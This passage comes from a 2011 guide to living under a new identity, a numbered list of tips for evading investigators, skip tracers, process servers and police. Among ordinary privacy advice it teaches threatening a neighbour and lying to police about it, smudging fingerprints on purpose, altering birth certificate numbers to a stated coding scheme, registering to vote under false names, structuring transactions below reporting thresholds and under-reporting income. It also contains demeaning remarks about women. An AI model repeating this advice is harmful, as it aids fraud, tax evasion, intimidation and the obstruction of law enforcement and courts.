carefully avoid +arguments. Your new neighbor may be the worst idiot you've +ever met, but no matter how insane his actions or +comments, avoid getting involved in arguments with him. Be +nice and swallow your anger. Don't throw parties, keep your +music down low, don't keep pets, keep your lawn clean and +live the life of a monk at least for the immediate future. If +you're forced into putting a neighbor in his place, speak to +them man to man and be very sure you're alone. Speak in +low tones to be sure you're not overheard. Tell him that you +killed better men than them in Vietnam (or if you're younger - +the Gulf War). +Unless he's a man of substance and character (and there +are damned few of them around these days) - he'll cave in +and keep his distance. (I pulled this stunt once and the guy +was so terrorized he packed up his whole family and moved +out of state the very next week!) If he calls the cops and they +come to visit, be as nice as you can be. Deny that you +threatened him in any way and stick to your story. Try to +appear as reasonable and clean cut as possible. Do not get +angry. Do not raise your voice. Deny everything. With no +witness they'll have no probable cause to arrest you. When it +comes down to his word against yours - the cops will leave +you be if you look credible. The police are experts at making +on the spot decisions and they'll almost always side with the +most credible looking of the two parties. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 138 - +Reproduction in any form is prohibited without written permission. + +8. Never deposit a check in an account that bears your +name. Instead take the check to the issuing bank and cash it +there. If the checks are regular paychecks, try to vary which +bank branch you visit along with the time of day and day of +the week. Don't make small talk with the teller. Always stay +low key. +9. Pay your bills in cash whenever possible. Money orders +can also be used but be sure to leave the payer line blank. +Money orders, particularly those from smaller firms sold +through convenience stores are your best bet. They're +tracked by their number not by your name. Never attempt to +buy a money order for more than $700 as the issuing firms +are required to submit a report to big brother on large +transactions. +10. If you have to visit a doctor or dentist, be careful about +providing genuine information. Pay in cash. Remember, +medical records are wide open to snoops and insurance +companies. What you tell your attorney is confidential but +what you tell your doc might as well appear on the front page +of the newspaper! Later when you have your new identity in +place, you can use a new doctor to help build your new +identity. If you have an unusual medical problem or need +unusual medications, snoops can use this information to +locate you. +11. Be careful about having anything delivered to your new +home. Your neighbors may notice any unusual deliveries. If +you're not home, a delivery service may automatically ask +your neighbor to receive and hold your package for you. This +would cause some raised eyebrows. Don't feed the rumor +mill. +12. Avoid joining any sort of group. A new membership will +provide a snoop with a direct link to you if the group is +involved in activities you enjoyed in your old life. Also, your +fellow members will be asking questions and talking about +you behind your back. Why expose yourself needlessly? +© Copyright 2011, Ariza Research, All rights reserved - ABP - 139 - +Reproduction in any form is prohibited without written permission. + +13. Never sign for a certified or registered letter or package +unless you know exactly what it is and who sent it. Skip +tracers love to use certified mail, as it's a cheap and quick +way to locate someone. They'll send a letter out via certified +mail to an address they suspect you may be using. If a +mailman appears on your doorstep, go to the door. If the +item is addressed to your old name - say "who?" and them +tell him that no one by that name lives at this address. +Or if your situation warrants it, you might want to send your +pursuers on a wild goose chase by saying that the +addressee used to live here but left last month when he got +a two-year contract to do some wilderness photography or +"mission work" down in Argentina. Skip tracers may also +send a letter to someone you don't know (probably a made +up name) and send it “in care of" you. They hope this will +cause you to lower your guard, as you would naturally want +to help a friend. +Or they may make the letter look like a check (a favorite +stunt). Don't fall for their tricks. If it arrives in the mail, write +"Addressee Unknown" or "Deceased" on it and drop it in the +nearest mailbox. +Be aware that when you get suspicious mail you just may be +in for a personal visit from a snoop. Be sure to notify anyone +that knows your true whereabouts not to forward ANY mail, +no matter the situation. Warn them that a snoop may pose +as an attorney who has a large check for you (from the +estate of an old friend of yours that recently died) and just +wants to know where to send the money so they can close +their books. It's an old trick that often still works. +14. Don't agree to accept the charges on a person-to-person +collect call. Just hang up. If you have a home phone, go +down to Radio Shack and buy one of their "Caller-ID +Blockers". An answering machine would also be a good +investment. Have your recording answer the phone with your +new name. "Hi this is Sam - I'm away from the phone right +now - Please leave a message and I'll get back to you as +soon as possible - thanks". This will throw off anyone who +calls looking for someone named Bill. You might also want to +mask your voice a bit also. Don't include any other info in +your recording. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 140 - +Reproduction in any form is prohibited without written permission. + +15. Be very careful what you tell your new neighbors. It's +best if you can provide the usual type of info. No more, no +less. If the information you provide is too vague or if you're +unwilling to share any info at all, it will raise a red flag with +your new neighbors and their gossip will shift into high gear. +So just have a story down pat and provide them with what +they expect. Always remember, your new neighbors are your +enemy. Don't confide in them, no matter how nice they +seem. Snoops may well give them a call. And since they +have no stake in your situation, they'll cooperate and spill the +beans. And be especially careful with lonely old lady +neighbors. Smile and be extremely nice to them. +Little old ladies are a paranoid bunch who will call the cops +at the drop of a hat if they dislike you or disapprove of your +lifestyle. Your dog barks - they call the cops. Your stereo is +too loud - they call the cops. They hear loud voices - they +call the cops. And they can make up some really wild tales +that will have the local police all over you. With the exception +of a lover, a neighbor is the second most likely person to +"blow your cover". +16. If you need a prescription filled, be very careful. Take +each prescription to a different pharmacy. Be careful about +providing a pharmacy with too much genuine information. If +you have an ongoing need for a particular drug you might +consider using one of those mail-order pharmacies. They +can ship you three months worth of your medicine right to +your doorstep. Always ask your doc if there is a generic +version of the drug you need as you won't have any +insurance so will need to pay full price. Some drugs can get +extremely expensive when you're paying full retail. If you +need a rare medicine you should know that snoops can use +this info against you. They can "flag" drug company +computers to notify them of all purchases of low-volume +medicines. +17. No matter what situation might arise, always be prepared +to provide a believable story as to who you are, where you +are coming from and where you are going to. Investigators +can smell a lie so you'll need to be so well prepared that you +can lie smoothly. (Just pretend you're a politician!) +18. Avoid taking long walks or drives at night. To do so +would expose you to the unwanted attentions of the police +that come out at night. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 141 - +Reproduction in any form is prohibited without written permission. + +19. Always drive the speed limit. This should be obvious but +then it's the obvious things that are the ruin of most identity- +changers. Strangely, the state troopers that patrol the +freeways will become suspicious if a car is driving exactly at +or just below the post speed limit. So just blend into the +traffic flow (which is usually moving along at around 5mph +over the limit). +20. Maintain a lower middle-class standard of living. If you're +too poor or too affluent you'll attract attention. Your car can +cause you problems if it's too expensive and so doesn't fit +into the story you provided your neighbors. +21. If you feel the need to "blow off steam" by partying - do it +somewhere else. Try a tourist spot or at least another city +(preferably in another state). How about Las Vegas or +Atlantic City? Don't do it anywhere near your home. +22. Cut your hair. Neat, clean and conservative is the look +you're shooting for. Shorter hair also makes you look +younger. Investigators can, with incredible precision, pick the +criminals out of a lineup simply by their long hair, odd +beards, cryptic tattoos and gaudy clothing. Above all you +need to blend in with your community and appear as though +you really belong there. +23. Become invisible. I had a friend who worked for the CIA +as an intelligence officer. He told me that part of his training +involved becoming invisible. To learn this art he would walk +around the downtown area of a major city visiting various +stores. He wore bland colored clothes, no personal jewelry +except for a plain looking Timex watch with a plain black +band. As he moved around he would avoid making eye +contact with anyone. +He would walk slowly and as quietly as possible. He would +keep his mind concentrated on distant places. He would +keep his left hand in his coat pocket and let his right swing +free. He kept his head tilted slightly down, his face +expressionless, his arms close to his sides and spoke in low +tones. He would not respond to loud sounds. When he made +a purchase he would say nothing to the clerk and would +keep his eyes focused on something twenty or thirty feet +away. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 142 - +Reproduction in any form is prohibited without written permission. + +After a few weeks of practice he could walk into a store +spend a half hour there, make several purchases and leave +without being noticed at all. When the sales staff were +questioned about him, they could accurately describe the +other customers in the store at the time but drew a complete +blank on my friend! They remembered him being there but +couldn't come up with anything like an accurate description. +He had become truly invisible. Whenever your walking +around in public, keep this in mind. +24. If approached or arrested by a law enforcement type say +nothing. If you do speak, tell the truth (though you don't have +any obligation to tell the whole truth). Lying to a cop is a +crime, which might get you arrested but being silent, isn't. +Remember, cops will test your truthfulness by asking a +question they already know the answer to. +Check the ACLU's web site. They have a nifty little card that +summarizes your legal rights when you're arrested. Get one +and memorize it. If they take you in for questioning the first +words from your mouth should be "I have nothing to say until +I talk to a lawyer". In most states the interrogation must, by +law, come to a complete halt until you've consulted with your +attorney. Anything you say after asking for your attorney will +probably be of no use in a court of law. +They may tell you that it's in your interest to cooperate (let a +lawyer confirm this before you speak). If they continue to +question you - ask to go to the bathroom. If they refuse to let +you go, keep asking. Ask for a doctor if you're sick (all this +stress is probably giving you a headache - right?) or have +been injured. If they ignore your demands keep repeating +them. Take special note and report their actions and exact +words verbatim to your attorney. They can be quite useful +later in court. Above all stay cool and ignore their verbal +assault. +Bluffing is a very common tactic. They may something like +"We know everything so you might as well spill the beans" +when they're really completely in the dark. Or "you friend told +us everything so you might as well come clean". It's called +"fishing". Think thoughts that are relaxing. Think of an old +girlfriend; think about baseball or a walk you took in the +woods. Don’t let them get under your skin. Oh, another thing +- start watching the TV program "Law and Order". +© Copyright 2011, Ariza Research, All rights reserved - ABP - 143 - +Reproduction in any form is prohibited without written permission. + +You'll learn a lot about how the law works. Always +remember, you have rights but it's a sad fact that you and +you alone will have to protect them. +25. Stay completely clear of illegal drugs. A single joint can +get you arrested and completely blow your cover. Stay away +from people who use drugs and be especially careful to +avoid people who sell them. Using illegal drugs at this point +is a really fast way to get busted. If you're new in town, that +nice guy who sells you drugs may well be an undercover +cop. Or you might get involved in a drug rip-off transaction, +which is worse as you may get shot. And when you're in the +can for that stupid joint you had hidden in your wallet - they'll +just take a few moments to run you through their little +computer. If you just have to get high, stick with my old +friend Jack Daniels. +26. Avoid pursuing any business or hobby that might attract +undue attention. Maybe you just love to make porno movies +or try your car out at the local drag races but trust me - now +is not the time. Applying for any sort of official license will get +your personal info entered into several easily searchable +government computers. +27. During the first year you should avoid being +fingerprinted. Avoid applying for sensitive or government +jobs as they almost always involve fingerprinting. When +applying for jobs listen carefully for any mention of a security +clearance being necessary. +Ask if you'll have to get one and if they say it's required by +the job, say "no problem" and quietly move on to another job +opportunity. The fingerprint that some states now require for +the issuance of a drivers license can however be ignored (at +least for the immediate future). The prints are retained on file +but are not sent off to the FBI. They're just trying to +intimidate you. +Most people are unaware that getting a useful fingerprint is +actually quite difficult. The finger must be pressed down with +just the right pressure. The finger must not rotate at all as +even the slightest rotation will render the print unusable. Add +to this the fact that most fingerprint takers are poorly trained +idiots (except those found in police departments) so you +know what to do. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 144 - +Reproduction in any form is prohibited without written permission. + +Press down too hard and rotate your finger slightly to +produce a useless print. It can take even an experienced +finger printer several attempts to get a good set of prints. +28. Avoid attending parties where you suspect illegal +activities may occur. That includes drugs, hookers etc. Being +caught up in a drug bust would be foolish right now. +29. Avoid public demonstrations or activist activities that +might expose you to mass arrest and screening. +30. If you need to have utilities installed, be very careful +about revealing too much personal information. Very few +utility companies have online verification available. Utility +records are an open book to snoops both private and official. +Anyone who recently lived overseas would lack the usual +utility references. They'll probably want a larger deposit as a +result. Pay it, it's a good investment. +31. Avoid applying for any sort of license if you can. Want to +go hunting? Do it in another state. +32. Create a new personal address book. Buy a brand new +one, transfer all the names in your present book in and then +code the phone numbers so that only you can make sense +of them. Make sure your code is tricky enough to fool an +experienced investigator. Just adding the number 3 to each +digit is far too simple. Adding three to the first digit and then +subtracting three from the next might work. Or make up a +new book and load it with random names and numbers +taken from the phone book. Then keep your real address +book in another carefully hidden location. +33. If you use the services of a "working girl", be sure to +keep her in the dark. These gals can be very dangerous +indeed. Pay her in cash and if she asks, give her some +phony personal story. She's used to this as most men don't +want a hooker to know anything about their personal lives. +Or use the old story "my wife doesn't understand me!". No +matter how nice she seems - she is not to be trusted! If you +plan to leave the area or stop using her services, whatever +you do - don't tell her in advance. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 145 - +Reproduction in any form is prohibited without written permission. + +On your last visit just show up as usual and depart leaving +her thinking that she'll be seeing you again real soon. She +sees you primarily as a source of income and people tend to +get cranky when they lose their meal ticket. Once she knows +you're gone, her loyalty to you is finished and she'll readily +reveal everything she knows about you to the first person +that asks. But she can't reveal what she doesn't know. +34. Make small financial deals. When you must do business +with a bank be careful as transactions over $800 are now +recorded on special forms the data from which is widely +distributed in the law enforcement community. If you get to +know a teller well enough, she'll tell you that every bank +branch is now required by federal law to maintain a +"suspicious transaction" list where they record any strange +looking transactions. Always try to manipulate your financial +dealings so as to leave you with the most cash possible and +keep a substantial bankroll with you at all times. Keep some +other cash carefully hidden in your car and residence. +35. Pay your taxes. The best approach here is to pay taxes +on all the income you earn on your job. If the income you +claim seems about right for the job title you list, you have a +very small chance of being audited. The quick and easy IRS +form 1040-EZ as it' so simple there's very little for the IRS to +be suspicious about. Don't claim dependents you don't have +as this is the one area they might want to investigate. Keep +any deductions verifiable. This short form almost guarantees +you won't be audited. +How much tax you pay on any other income you might have +is up to you. This approach is more popular than you might +think. Any IRS auditor will tell you about the business owners +they audit who claim consistent business losses year after +year yet manage to live the lifestyle of the rich and famous. +One guy I used to know down south owned a gas station +and claimed a paltry salary of only $15,000 per year. +Yet he lives in a large comfortable house in a prestigious +older neighborhood, drives a new Lincoln, has an extensive +collection of rare coins and vacations in exotic foreign +places. Could it be that he's "skimming" cash from his cash +register each night? +© Copyright 2011, Ariza Research, All rights reserved - ABP - 146 - +Reproduction in any form is prohibited without written permission. + +36. Need help with your resume? Employment can be a +tricky subject for a recent identity-changers. The attached +resume report will help you cover unemployed periods and +past firings. +37. If you rent a place, quietly have the front door lock +changed. Don't tell the landlord. If you do they'll immediately +demand a copy of the new key. Just quietly change the +damned thing even though your lease will probably forbid it. +Call one of those mobile locksmith outfits and have them do +it one Saturday or Sunday night as late as possible. I once +rented a deluxe apartment in one of those modern high-rise +buildings. When I came home one night I found that my TV +was warm. Was someone watching my TV during the day +while I was at work? I set up a trap. +I left a copy of Penthouse magazine on my coffee table. I +made a small almost invisible pencil mark on the table top +and then laid the magazine down with it's left edge aligned +precisely on the line. The next day I returned to find my +magazine had magically moved several inches and was at a +different angle. Privacy is often very hard to come by when +you live in a rented apartment. +Landlords can be very sneaky and snoopy. Keep this in mind +and change that key! If your landlord informs you that they +know you changed the lock and now wants a copy of the +new key. Ask them "why did you need to get into my place?" +Tear their excuse apart and humiliate them if you can. If they +insist, provide them the new key. Let them test it and then +quietly change the lock once again several weeks later. He'll +get the idea. It's a war he can't win. Or if your apartment +allows pets, why not consider getting a rather territorial dog? +(Dobermans are a good choice) That might keep the +landlord away from your door. +38. If you suspect someone is entering your apartment +without your permission try this tactic. Take one of those little +six inch long flexible plastic rulers with you as you leave your +apartment. After you've closed your front door slide the ruler +in between the top of the door and the door jam. Push it in all +the way. You should just be able to see the end of the ruler +when you look up. Make a mental note of where it is relative +to the side of the door (or even mark it's location lightly with +a small pencil mark) +© Copyright 2011, Ariza Research, All rights reserved - ABP - 147 - +Reproduction in any form is prohibited without written permission. + +When you return home before you stick your key into the +lock - look up. Is the ruler still in just the right place? A snoop +won't see the ruler and will walk right in. One of two things +will happen. He will either not notice that the ruler has fallen +behind the door or if he's an observant snoop he'll see it and +want to return it to it's original place. But where exactly was +it? And best of all, he will know that you set a trap and he's +been busted! He won't be around again anytime soon. +39. Place sensitive documents and your cash in a high-quality lock +box and hide it very well. Buy another small safe or lockbox, put +junky documents in it and place it in an obvious place where a +thief would look. Many rich people buy two safes. +One they place in the wall in their living room behind a picture +where a burglar would be sure to find it while the other one is well +hidden in a dark corner of the basement. A thief will seldom take +the time to search for a second safe. They'll spend some time +working on the easy-to-find safe and never both to look further. +40. Experienced identity-changers advise recent changers have +cable installed and plan to spend most of your time indoors until +the new identity gets firmed up. This is a tricky phase and needs +special attention. Every time you step out your front door you're at +risk. There's no place like home. +41. Visitors to your home should look like they belong in your +circle of friends. A "normal" kind of guy wouldn't have unsavory +bikers and whores hanging around. Any guests should dress well +and blend in with the whole neighborhood. Unusual visitors get +noticed. Be a boring neighbor and be sure your guests are boring +too. +42. If you attempt to make a credit card purchase be sure - very +sure - that your card is good. If it's a secured card call the issuing +bank's toll-free number to be sure what your balance is just before +you leave the house. +Do the same with a regular credit card to be sure your remaining +balance will allow you to make purchases. If the card is refused +simply say "Oh that stupid bank, this is the second time this month +their computer system has been down!" +I recently had a brief conversation with a sales clerk at Sears who +told me that she gets a dozen or more card refusals a day (usually +for exceeding credit limits) but the clerks don't really trust the code +the cash register provides so will usually just hand the card back +with a smile (if you look like an normal person). Ten years ago a +refused card was a rare and embarrassing event. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 148 - +Reproduction in any form is prohibited without written permission. + +43. Voter registration records are fully available for public review +and are sold on CD/ROMs for private investigators or anyone else +who has the purchase price. But keep in mind that with so few +people voting these days, it's very easy to get a voter registration +card in any name you want with almost no ID required. I went with +a friend recently who registered to vote in Colorado and didn't +even have to provide any ID at all. She just filled in a simple form. +44. Don't enter contests of any kind. Businesses build their mailing +lists by offering contest prizes. (many are never really awarded +anyway) +45. If you must get married, you might want to get hitched while +overseas. The Caribbean would be a good spot. +46. Be careful to avoid getting on junk mail lists. Don't' send in +warranty cards or answer consumer surveys. +47. Call your local phone company and sign up for caller ID +blocking if you didn't get the Radio Shack blocker box. +48. Don't register for and then use "preferred customer" cards. All +of the largest national book stores push these cards and now +many other retail outlets are using this ploy. Stay clear. If they get +pushy, just say that you live overseas so getting on their list is a +waste of time for you. +49. Don't contribute to charities or political campaigns. Once you +do either, you will get on a ton of mailing lists which can be +searched by interested parties. +50. Don't buy a boat, plane or other item that requires licensing. +51. Don't include you name on any corporate charters. If you must +set up a corporation, do it out of state. FYI - the best states for +incorporation are Nevada or Delaware. Most of the largest +companies in the US are Delaware corporations. Low taxation, +restricted access to corporate records and friendly courts are the +primary reasons. +52. Don't get behind on your bills. Pay everything on time if you +possibly can. +53. Even with caller ID disabled and a radio shack blocker +installed, anyone you call using a toll free number can access your +number. So don't call toll free numbers unless you don't mind +them getting your number. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 149 - +Reproduction in any form is prohibited without written permission. + +54. Don't use your bank ATM or debit card to purchase items +(unless it was issued by an offshore bank). Even off-shore based +credit cards are being monitored by the government these days. +55. Don't file for building permits as they are usually public +records. +56. Don't put any identifying information on your car. No +bumper stickers, window stickers or anything else that is +visible from outside the car. Well, maybe a small "just say no +to drugs" or "support your local police" bumper sticker +wouldn't hurt. +57. If you must get documents notarized, have it done in another +county. +58. Be careful when asked about your occupation. Don't just +automatically list your real field. Change it from time to time. I like +"engineer". It's harmless and very non-specific. "Administrative +Assistant" is another safe title. They won't raise any eyebrows. Or +just mumble "I work for Acme Furniture". People who have +working-class blue-collar jobs would rather say where they work +than admit they're really a janitor or garbage man. +59. Avoid having a garage sale as a local license or permit may be +required and it might feed the rumor mill to have all kinds of +personal items spread out in full view for everyone to see. +60. Be very careful what you say using a cordless phone. It would +be best to avoid using them altogether as even the best of them +isn't as secure as an old-fashioned corded phone. If you must +have one, be sure to buy the latest model that operates on a +higher frequency (900Mh) and uses multiple frequencies ("spread +spectrum"). A regular old corded phone is much more secure and +a whole lot cheaper. +61. Be sure to tell your family and friends to be careful with callers. +Investigators will use all sorts of ploys like "I'm an attorney that +needs to settle an estate and need to send John a certified check +for $25,000, can you help me find him?" They may even pose, as +an old friend who is dying and just wants one last chat before they +expire. Tell them to expect the unexpected and be very skeptical +of any calls. +62. Avoid having an outstanding judgment listed against you. If +you lose a case in court, pay off the judgment as quickly as +possible. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 150 - +Reproduction in any form is prohibited without written permission. + +63. Most banks request your mother's maiden name for security +purposes. Make up a new one and always avoid using your real +mother's maiden name. This tip is just good common-sense +security. Identity thieves usually assume that your mother's actual +maiden name was used on bank accounts. Don't make it easy for +them! +64. Use cash deposits when you open an account with a +videotape rental store. Give them as little information as possible. +If they ask for a larger deposit than usual - cough it up as it's a +sound investment in your privacy. +65. Avoid putting your name on your mailbox if you can. If you +must, write it sloppily in very small letters so that no one can read +it. Also use a single initial for your first name. "J" is the best first +initial for a man as it's so popular and difficult to guess (Jack, +John, Jim). +66. Consider having a phone line installed in a friends home and +then have calls forwarded using "call forwarding". +67. Avoid making personal calls or revealing anything personal on +a phone at work. In most states your employer can now legally +monitor your phone calls, Internet activity (stay away from internet +pornography) and email. +68. If you can, pay for prescription drugs with cash instead of +using insurance. Insurance claims are filed online and your new +address will appear in their database. Carefully control how much +information you provide your pharmacist. Various snoops have +access to these databases, which they can easily search. +69. Don't subscribe to new magazines. Subscription databases +are sold and shared all over the place. +70. You simply must sell your car and then buy a new one (with +cash) if you're to be a successful identity changer. If you keep +your present car and change your name on the title, anyone +looking for you can very easily run a check on your vehicle's +unique "Vehicle Identification Number - VIN" which will list all the +people who have ever owned the car. Both your old and new +names and addresses will appear right there together on one +sheet of paper. +The best bet is to buy a car you wouldn't usually consider driving. +If you've always driven a flashy luxury car, perhaps this is the time +to buy a used Japanese sub-compact, or the other way around. +Experienced identity-changers report that their passion for a +particular make or model of car trips up far too many people. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 151 - +Reproduction in any form is prohibited without written permission. + +71. If you must accept a check, instead of opening up a checking +account or going to one of those storefront "we cash any check" +places (stay away from them for sure as they enter all your +information in several different easily searched databases) you +simply take the check to the issuing bank and cash it there. +72. Successful identity-changers advise signing a new signature +until it becomes second nature. Some identity-changers have +accidentally signed their old names to an important document. +Only by repeating the signature over and over can it become +almost automatic. Sit with a pad signing over and over. Then +promptly throw the paper in the trash. You should practice signing +an illegible signature. It can come in handy when you sign for +deliveries. +73. If you need to take a drivers test to get a new drivers +license, borrow a car from one of those driving schools. (Pay +any fee they may ask) Do not take your car or a friend’s car, +as the testing officer will record the license number. +74. When you hit a new town start reading the local paper from +front to back. This will give you the lay of the land. In particular +notice where arrests are made. Avoid any bars or other +establishments where regular arrests take place. In particular +avoid any place where drug arrests are common. If the police +come up with wanted criminals each time they "sweep" a bar, +they'll get in the habit of running sweeps on a regular, random +schedule. +75. The best time to apply for a new social security card is March +or April. This is the peak period for applications as many +taxpayers discover that in order to claim their kids on their taxes, +they must first obtain social security numbers issued for them. +76. State issued birth certificates have a coded number on them. If +the number does not decode properly, you'll never get anywhere +with it. Just be careful to change only the last three or four digits +and leave the front of the code intact. If you change your state of +birth you'll have to alter the entire number. +1st Digit is always a one. +2nd and 3rd Digits are the state code number: (New York is 31) +4th and 5th Digits are last two number of year of birth (1979=79 +Last six digits - random sequence +© Copyright 2011, Ariza Research, All rights reserved - ABP - 152 - +Reproduction in any form is prohibited without written permission. + +77. Your new identity will become much firmer after the first year. +During the first year you have no real history, which will look +suspicious to anyone who checks on you. Submitting an +application for a passport, for instance, will be a problem if all of +the ID is relatively new. (Clerks are trained to spot fresh ID) A +driver’s license that is over a year old is best. +78. When you get a new phone number, insist on an unlisted +number. Be VERY careful about who you give this new number to. +Instruct those you do give the number to be very suspicious of +anyone who asks for the number. They will tell all sorts of lies to +get that number. Tell them to just take a message. If possible, do +not give the number out to anyone. +Also, most phone companies will now allow you to list your +number under another name for no additional charge (this is +usually cheaper than paying for a formal unlisted number). If they +allow it - use it. List your new number under something like "R. +Miller". +Also, when someone calls and asks for "Mr. Miller" you'll know +they're just another telemarketing fool. Some phone companies +now offer new privacy services. +It works like this: someone calls you. If their number is on your +"approved" list, the call rings through as usual. But if the number +isn't in your list, the call is forwarded to a voice mailbox where the +caller can leave you a personal message, if they want. The bottom +line is this: if the phone number they're calling from isn't on your +list - the call doesn't ring through. +79. Get an answering machine and use it. Screen all your calls +through it. Make a recording like "Hello, you have reached 555- +1234. Leave a message and I'll/We'll get back to you soon." Do +not mention even your first name. +Do not provide any other information. If you are single and living +alone say "we'll get back to you soon". If you are married or +shacking up, say "I'll get back to you soon". Why hand out +information you don't have to? +80. Avoid the temptation to live in a nice little rural area, or return +to your old stomping ground. You will never find anonymity in +Mayberry. (Remember how Sheriff Taylor and Deputy Barney Fife +used to sit around exchanging gossip all afternoon?) To avoid +undue gossip and attention, you'll need to live in at least a medium +sized city. Anyone trying to find you will call directory assistance +and ask for your listing. If there is no listing or your number is +unlisted the caller may ask for any other listings in that area with +the same last name. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 153 - +Reproduction in any form is prohibited without written permission. + +If your last name is Przbylowicz - they will immediately call any +other Przbylowiczs in town. But if your last name is miller and you +live in Chicago - they will be confronted with a list of a several +hundred different Millers, which makes follow-up all but +impossible. +81. If a third party bill collector contacts you by phone or mail to +collect a debt, if the debt is real - pay it off immediately without any +further dealings. But if the debt isn't valid - immediately respond to +the letter by certified mail insisting that the debt is invalid. This will +cause the bill collector to stop and re-evaluate his plan. Always +deny everything. The bastards will either give up or at least the +tactic will postpone payment long enough for you to get the +required cash together. If the creditor employs the caller, don't try +this tactic. There's a great book on this subject entitled "The +Check is in the Mail". +82. If you are living with a child either your own or someone else's +be sure to carefully train them not to reveal information to anyone +either by phone or in person. Children are very trusting little souls +and many freedom lovers have been exposed by the comment of +an innocent child. +83. By using an official US post office box you will delay or +confuse anyone searching for you. I prefer the private corporate +boxes available from Mail Boxes Etc.. And other similar store front +operations. Either way these outfits will reveal your listed home +address to anyone who requests it so always be careful about +how much information you provide them. +Since the post office requires a fee for revealing this information, +requests must be mailed in and the information is not available +over the phone. Many bill collectors won't bother with a request. +84. Institutions of higher education are famous for giving out +personal information on their students. You should always list a +PO box address on any paperwork you give them. Many schools +will now allow alumni to change the official record number their +transcripts are recorded under from their social security number to +some other random figure. Identity thieves depend on the use of +your social security number for finding all kinds of records. +85. Libraries keep records on what books you read and new laws +require them to surrender those records to government snoops. +(Especially since the Patriot Act was passed.) Avoid getting a +library card in your new town. Or if you do feel the need, be +careful about the information you provide them. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 154 - +Reproduction in any form is prohibited without written permission. + +86. It's extremely important that you keep your work phone +number to yourself. Do not give it out to anyone. Get a "stand- +alone phone mail" number instead. (For around $15 a month you +get your own new phone number which is not in any way +connected to your home phone. It operates just like an answering +machine and you pick up your messages by calling a number from +anywhere in the world and entering your secret password) +If an investigator stumbles on your work phone - you're finished. +They know you have to be there so they have you either to grab or +contact via phone whenever they want. Guard that work phone +like a hawk. If your number is discovered and you get a call, you'll +be forced to consider changing jobs. +87. When answering a suspicious phone call - call from a +payphone as far from your new home as possible. It's the only +way to be sure they won't get your number. But such a call would +reveal the general area you're living in. +88. If you have to make a payment to a collection agency - always +pay with a money order. Never, ever send them a personal check. +A check contains far too much personal information. Once they +have all that banking information they can cause you all sorts of +problems. +If you have an outstanding judgment against you out there +somewhere, the sum will soon vanish from your account without +any notice at all. +89. When you move, never file a change of address card with the +postal service. Instead notify any individuals that you want notified +(but keep this list to a bare minimum) +90. Your landlord can be a real problem for you. An investigator +who has your address but no phone can use the local tax records +to locate the owner of the property. They will contact them by +phone. Unfortunately most landlords are very open about sharing +information as they expect others to return the favor for them. +They have no reason to protect your privacy. +91. Since Sept. 11, 2001 the legal climate has changed. Under the +new rules the government can tap your phone or mail without +having to go to the bother of obtaining those pesky warrants. Our +constitutional rights are becoming but a distant memory. Read the +paper and keep yourself up-to-date on the latest developments or +your privacy will vanish. +92. Be very suspicious of any unexpected checks you may receive +through the mail. If you can cash the check at the issuing bank but +be careful about giving them your home phone or address. If this +© Copyright 2011, Ariza Research, All rights reserved - ABP - 155 - +Reproduction in any form is prohibited without written permission. + +doesn't work for you, you can always endorse the check and use it +to pay a bill or debt owed to another party. But whatever you do, +don't endorse it and deposit it into any bank account you want to +keep private. Remember, the person who wrote the check will get +their cancelled check back with your account number and bank +name on the back. +The GED Follies +One of the really serious problems identity changers run into has +to do with educational qualifications. How can you take your +academic credentials with you without "blowing your cover?" +One quick way around the problem comes through the +popular GED system. You can earn GED certificates at +either the high school or college level. You register, take a +few classes and sit a test. If you score high enough in +enough different categories and you get your credit and +credential. +The best angle here is that the registration process is very +lax and doesn't require any really serious ID. Just be sure to +study up enough that you'll have no problem with the test. If +you can provide a copy of your DD-214 showing an +honorable discharge, many states will also issue you a state +high school diploma, which every employer in the state is +legally required to accept. +Bogus College Degrees +The following Internet outfits are well-known diploma mills and +should be avoided: +Columbia State University (Louisiana) +La Salle University (Louisiana) +Chadwick University (Alabama) +American State University (Hawaii) +American International University (Alabama) +Columbus University (Louisiana) +Monticello University (Kansas) +Frederick Taylor University (California) +Pacific Western University (Hawaii) +City University (California) +Kennedy Western University (Hawaii) +Trinity University (Great Britain) +© Copyright 2011, Ariza Research, All rights reserved - ABP - 156 - +Reproduction in any form is prohibited without written permission. + +Most employers know these degrees are phony so don't +waste your money! +Avoiding Process Servers +Process servers can be very pesky indeed. Here are some +strategies for avoiding being served that others have found useful. +First it's important to know that process servers are extremely +underpaid which works to your advantage. The server is usually +private employed as a sort of independent entrepreneur. He pays +out of his own pocket for gas and other costs and then relies on +the fee he gets when a successful service is recorded to provide +him a living. +If you can frustrate a process server once or twice, he'll be much +less likely to pursue you again. Why waste more time and money +on someone who clearly understands the game and is not likely to +fall for his shallow tricks? +He'll quickly add you to his list of "problem customers" and move +on to more easily served suckers. +Let's start out with the basics. If some walks up to you and says in +a loud clear voice "are you (your real name)?", a common tactic is +to completely deny that you even know anyone of that name. Or +say "Oh him, yes I knew him but he's a nature photographer up in +Alaska now". +If your name is Smith, why not invest a few bucks in a front +doormat that says "Robinson" on it? Then mislabel your mailbox +with the same pseudonym. Though it's technically illegal for them +to do so, many process servers will open your mailbox and look at +your mail to see if you're residing at a particular residence. A +locked mailbox might be a useful option. +A process server cannot legally demand that you provide personal +ID. A short story: I moved to Florida and bought a nice +comfortable house. Little did I know that the previous owner was a +degenerate gambler who owned a lot of money to various people! +When I bought the house, the seller (Mr. Anderson) moved back +up north but refused to provide me with a forwarding address. +One day as I was settling down to a quiet evening when there's a +loud knock at the door. In my door stands a tall extremely hostile +young lady. She launches right into her threats "See here Mr. +Anderson, we've waited long enough - we have to have something +on this account right now!" I mumbled "But I'm not Anderson". +© Copyright 2011, Ariza Research, All rights reserved - ABP - 157 - +Reproduction in any form is prohibited without written permission. + +She keeps right on with her attack without a pause "Let us not +play games here Mr. Anderson - I need a check and I want it +now!" I repeated "But I'm not Anderson". As she continued her +tirade, I slowly pulled out my driver’s license and held it up two +inches in front of her nose. She paused, stared at the driver’s +license and said, "Oh - I see". It stopped her dead in her 